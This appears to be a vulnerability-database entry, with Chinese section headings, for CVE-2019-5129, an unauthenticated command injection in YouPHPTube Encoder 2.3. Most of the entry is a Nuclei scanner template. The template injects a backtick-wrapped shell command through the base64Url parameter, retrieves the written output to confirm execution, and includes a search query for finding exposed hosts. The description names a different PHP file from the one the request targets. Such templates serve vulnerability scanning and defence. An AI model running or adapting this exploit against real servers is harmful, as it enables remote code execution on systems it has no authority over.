漏洞描述
Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
CVE-2019-5129: YouPHPTube Encoder 2.3 - Command Injection
PoC代码[已公开]
id: CVE-2019-5129
info:
name: YouPHPTube Encoder 2.3 - Command Injection
author: pussycat0x
severity: critical
description: |
Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
reference:
- https://xz.aliyun.com/news/6312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-5129
cwe-id: CWE-78
epss-score: 0.8988
epss-percentile: 0.99552
cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:*
metadata:
verified: true
vendor: youphptube
product: youphptube_encoder
fofa-query: icon_hash="-276846707"
tags: cve,cve2019,youphptube,rce,encoder
variables:
file_name: "{{rand_text_alpha(4)}}.txt"
content: "id"
payload: '{{base64(concat("`", content, " > ", file_name, "`"))}}'
http:
- raw:
- |
GET /objects/getSpiritsFromVideo.php?base64Url={{payload}}&format=jpg HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
GET /objects/{{file_name}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
# digest: 4b0a00483046022100ded88b3a4f2f75d5c87d33fcfa806ad6e28c89e996b2b461253144e7cbd32482022100acd0e0a06661208f17277413f415ad0581f24d6cf1441c8ddd0fc5781d077ec5:922c64590222798bb761d5b6d8e72950